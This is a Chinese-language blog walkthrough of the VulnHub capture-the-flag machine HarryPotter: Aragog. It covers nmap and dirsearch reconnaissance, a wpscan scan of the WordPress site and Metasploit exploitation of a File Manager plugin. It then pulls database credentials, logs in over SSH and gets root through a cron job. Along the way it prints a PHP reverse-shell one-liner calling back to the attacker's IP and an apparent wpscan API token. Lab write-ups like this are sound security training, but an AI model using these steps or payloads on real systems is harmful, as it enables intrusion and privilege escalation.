【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)
作者名:Demo不是emo?
主頁(yè)面鏈接:主頁(yè)傳送門
創(chuàng)作初心:對(duì)于計(jì)算機(jī)的學(xué)習(xí)者來(lái)說(shuō),初期的學(xué)習(xí)無(wú)疑是最迷茫和難以堅(jiān)持的,我也剛接觸計(jì)算機(jī)1年,也在不斷的探索,在CSDN寫博客主要是為了分享自己的學(xué)習(xí)歷程,學(xué)習(xí)方法,總結(jié)的經(jīng)驗(yàn)等等,希望能幫助到大家
座右銘:不要讓時(shí)代的悲哀成為你的悲哀
專研方向:網(wǎng)絡(luò)安全,數(shù)據(jù)結(jié)構(gòu)
每日emo:人們感到委屈的時(shí)候通常就說(shuō)睡了
?
?今天的博客內(nèi)容是HARRYPOTTER: ARAGOG (1.0.2)教程(簡(jiǎn)單難度),靶場(chǎng)環(huán)境來(lái)源于VulnHub,該網(wǎng)站有很多虛擬機(jī)靶場(chǎng),靶場(chǎng)平臺(tái)入口在這,推薦大家使用,大家進(jìn)去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下載今天的靶場(chǎng)了,也可以找我拿,開(kāi)始對(duì)今天靶場(chǎng)的介紹
這是哈利波特vm系列的第一個(gè)靶場(chǎng),總共有三個(gè)靶場(chǎng),其中隱藏了8個(gè)魂器,今天這個(gè)靶場(chǎng)中隱藏了兩個(gè),意思就是今天的靶場(chǎng)有兩個(gè)flag,話不多說(shuō)我們來(lái)見(jiàn)識(shí)見(jiàn)識(shí)
靶場(chǎng)地址HarryPotter: Aragog (1.0.2) ~ VulnHub
目錄
一:攻擊準(zhǔn)備
二:信息收集
?1.http服務(wù)探測(cè)
2.wpscan工具?
?3.msf獲權(quán)
三.最終提權(quán)?
?1.數(shù)據(jù)庫(kù)權(quán)限
2.用戶權(quán)限
3.root提權(quán)
四:拓展?
一:攻擊準(zhǔn)備
直接在vbox導(dǎo)入就可以,如果出現(xiàn)了報(bào)錯(cuò),就把啟用usb控制器關(guān)掉就可以正常打開(kāi)了
這里除了到vulnhub下載到的目標(biāo)虛擬機(jī)環(huán)境,還需要一臺(tái)kali,并且兩臺(tái)處于同一網(wǎng)段(可以都用橋接模式),虛擬機(jī)管理設(shè)備用vm和virtual均可,我這里就用virtual來(lái)給大家演示了,如下面這樣就是搭建完成了,具體搭建過(guò)程就不多講了,不懂得也可以私信問(wèn)我?
?(因?yàn)槲疫@是校園網(wǎng),有防護(hù)所以c段不同,這里都用橋接模式即可,而且靶機(jī)也顯示了ip地址,只要能ping通就可以進(jìn)行靶場(chǎng)操作了)
二:信息收集
?這里看到,我的kali攻擊機(jī)的ip是172.21.100.73,而目標(biāo)機(jī)器的ip是172.21.122.235,既然知道了對(duì)方的ip,我們就直接用nmap詳細(xì)掃描一下,掃描結(jié)果如下:
?1.http服務(wù)探測(cè)
根據(jù)上面的掃描結(jié)果可以看到對(duì)方開(kāi)啟了22端口(ssh服務(wù))和80端口(http服務(wù)),因?yàn)閟sh需要用戶名等敏感信息,所以我們就先探測(cè)對(duì)方的http服務(wù),即通過(guò)目標(biāo)的ip訪問(wèn)目標(biāo)搭建的網(wǎng)頁(yè),訪問(wèn)結(jié)果如下:
可以看到這個(gè)頁(yè)面內(nèi)只有一張圖片,而且在f12開(kāi)發(fā)者審查元素里面也沒(méi)有發(fā)現(xiàn)異常,在靶場(chǎng)之中看到圖片,大部分都涉及了隱寫術(shù),這里我們用wget命令把圖片下載到本地再輸入steghide工具(一款開(kāi)源的隱寫工具)使用info參數(shù)查看圖片,命令如下:
steghide info harry_potter_1.jpg具體操作如下:
可以看到提取圖片數(shù)據(jù)時(shí)需要密碼,我們并沒(méi)有密碼,隱寫術(shù)的探索就只能暫停了,所以想要繼續(xù)探測(cè)http服務(wù)就只能找敏感目錄,這里我們使用kali?自帶的dirsearch目錄爆破工具來(lái)探測(cè)目錄,命令如下:
dirsearch -u "172.21.122.235" -e *探測(cè)結(jié)果如下:
可以看到這里掃出來(lái)目錄中,/index.html,/javascript, /server-status,/blog下的部分目錄,并且出現(xiàn)了wp-login.php,這也說(shuō)明了這是一個(gè)wordpress的cms框架,這些才可以訪問(wèn),我們依次嘗試,果然在blog這個(gè)頁(yè)面發(fā)現(xiàn)了作者給出的提示,提示如下:(這里其他的訪問(wèn)頁(yè)面就不展示了,太多了)
就是這樣一個(gè)頁(yè)面,因?yàn)槿怯⑽?#xff0c;所以我們也可以來(lái)翻譯一下?
這里大家能看明白了吧,他提示了這是一個(gè)wordpress站點(diǎn),這也印證了前面我們的猜想,同時(shí),這個(gè)blog頁(yè)面應(yīng)該也是wordpress搭建的根目錄,
2.wpscan工具?
我們這里還是用kali自帶的工具wpscan來(lái)進(jìn)一步獲取信息,這是一款專門用來(lái)探測(cè)wordpress站點(diǎn)漏洞的工具,還可以檢測(cè)wordpress站點(diǎn)用的插件存在的漏洞?,但是這款工具wpscan規(guī)定掃描漏洞時(shí),需要帶上token值,才能顯示出漏洞詳細(xì)信息。這個(gè)token只需要去他的官網(wǎng)注冊(cè)一下再登錄就可以拿到了,如果不帶token值,不會(huì)顯示漏洞信息
這里拿到了token值 ,再依次輸入下面指令(把ip換成你們自己攻擊機(jī)的ip)即可
檢測(cè)wordpress站點(diǎn)的漏洞 wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog檢測(cè)wordpress站點(diǎn)所用插件的漏洞 wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog -e vp站點(diǎn)漏洞檢測(cè)結(jié)果如下:
可以 發(fā)現(xiàn)該站點(diǎn)的插件中有很多漏洞,而且都是關(guān)于file?Manager的,所以我們直接去msf上看看有沒(méi)有對(duì)應(yīng)的漏洞利用工具
?3.msf獲權(quán)
直接打開(kāi)kali的msfconsole,這個(gè)就不用介紹了吧,再使用search命令查找可以利用的工具,查找結(jié)果如下:
可以看到有四個(gè)結(jié)果,我們使用第二個(gè),因?yàn)檫@個(gè)名稱正是我們剛才探測(cè)出來(lái)的4個(gè)漏洞之一,use 1進(jìn)入到該工具內(nèi),再使用info命令查看需要配置哪些東西
?可以看到這里需要配置rhost(目標(biāo)主機(jī)),targeturl(目標(biāo)網(wǎng)址),這個(gè)目標(biāo)網(wǎng)址會(huì)自動(dòng)跟前面的目標(biāo)主機(jī)拼接,所以我們直接把rhost設(shè)置為靶機(jī)的ip,targeturl設(shè)置成/blog即可,這里因?yàn)槭褂玫氖欠聪?#xff0c;所以還需要配置自己的主機(jī)ip,再運(yùn)行即可,效果如下:
可以看到,這里我們成功拿到了網(wǎng)站權(quán)限,第一個(gè)魂器就在家目錄的hagrid98目錄下
?這段亂碼一看就是base64格式,我們直接拿去在線站點(diǎn)解壓,解壓結(jié)果如下:
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets
翻譯:1:里德?tīng)柕娜沼洷颈还诿苁抑写輾?/p>
三.最終提權(quán)?
?1.數(shù)據(jù)庫(kù)權(quán)限
?前面獲得的是網(wǎng)站權(quán)限,而且第二個(gè)魂器還沒(méi)拿到,所以我們繼續(xù)探索,wordpress用戶會(huì)在mysql數(shù)據(jù)庫(kù)中存儲(chǔ)信息,在/etc/wordpress里可以打開(kāi)config-default.php。這里記錄了MySQL的用戶名密碼,可以用于登錄數(shù)據(jù)庫(kù)
注意:登錄數(shù)據(jù)庫(kù)之前得首先得獲取一個(gè)tty shell,不然我們?cè)跀?shù)據(jù)庫(kù)中的命令就看不到回顯(可以理解為將非交互式shell變成了交互式shell),輸入下面命令即可拿到tty shell?
python3 -c 'import pty; pty.spawn("/bin/bash");'步驟如下?
?像上面這樣就是拿到了tty 權(quán)限,接下來(lái)就是根據(jù)上面拿到的mysql的賬密來(lái)嘗試遠(yuǎn)程登錄了
?
可以看到這里我們成功登陸了目標(biāo)的數(shù)據(jù)庫(kù),wordpress數(shù)據(jù)庫(kù)保存的用戶名和密碼一般都放在wp_users表里面的,我們直接查找里面的內(nèi)容試試?
成功拿到了用戶名和密碼,我們將密碼拿去md5在線站點(diǎn)解密,解密的結(jié)果如下:
password1232.用戶權(quán)限
?因?yàn)槲覀儎偛旁跀?shù)據(jù)庫(kù)中拿到了賬密,最開(kāi)始的信息探測(cè)中又發(fā)現(xiàn)目標(biāo)開(kāi)啟了ssh服務(wù),所以我們直接嘗試遠(yuǎn)程登錄ssh服務(wù),步驟如下:
成功拿到用戶權(quán)限,現(xiàn)在我們就該考慮怎么提升為root權(quán)限了
3.root提權(quán)
?
?這里我們嘗試了查找了一下作者有沒(méi)有留下可以sudo提權(quán)的工具和歷史命令,都沒(méi)有發(fā)現(xiàn),那就很可能是敏感文件了,我們先看看bak備份文件
成功發(fā)現(xiàn)了一個(gè)以sh為后綴的文件,相信大家平時(shí)沒(méi)少看到此類文件吧,此類文件大多都是腳本,我們用cat再仔細(xì)看看
這個(gè)腳本的大概意思是,把上傳的文件復(fù)制到tmp這個(gè)目錄里,即拷貝文件?,說(shuō)明這個(gè)文件每過(guò)一段時(shí)間就會(huì)執(zhí)行,推測(cè)應(yīng)該被寫入了計(jì)劃任務(wù),這里我們嘗試建立一個(gè)反彈shell的腳本并通過(guò)它這個(gè)計(jì)劃任務(wù)來(lái)執(zhí)行
在tmp文件下創(chuàng)建反彈shell的php腳本并命名為a.php,腳本代碼如下
<?php $sock=fsockopen("172.21.100.73?",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
因?yàn)槲覀儾聹y(cè)有一個(gè)計(jì)劃任務(wù)會(huì)不斷執(zhí)行剛剛我們找到的.backup文件,所以我們把執(zhí)行腳本的命令也寫入該文件內(nèi),讓其不斷執(zhí)行腳本,加入代碼后如下?
?這里的/usr/bin/php是php的執(zhí)行文件的目錄,這樣才能執(zhí)行php文件,可能有的同學(xué)執(zhí)行文件位置不一樣,所以就需要找一下了
?再新開(kāi)一個(gè)終端,監(jiān)聽(tīng)9999端口,不到一分鐘就可以接收到shell了,可以看到是root用戶了已經(jīng)
四:拓展?
這里我們也可以來(lái)查看一下計(jì)劃任務(wù),進(jìn)一步驗(yàn)證我們的猜想
可以看到,root下確實(shí)存在了一個(gè)計(jì)劃任務(wù)來(lái)執(zhí)行剛才那個(gè)腳本文件 ,給自己點(diǎn)個(gè)贊
到這里今天的靶場(chǎng)就全部結(jié)束了,如果你看到這里了希望你也能給自己點(diǎn)個(gè)贊,最后,感謝大家的閱讀,有什么問(wèn)題隨時(shí)都可以問(wèn)評(píng)論或私信我,加油哇
總結(jié)
以上是生活随笔為你收集整理的【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 30岁测试员在一家公司工作八年后,告别“
- 下一篇: Docker速成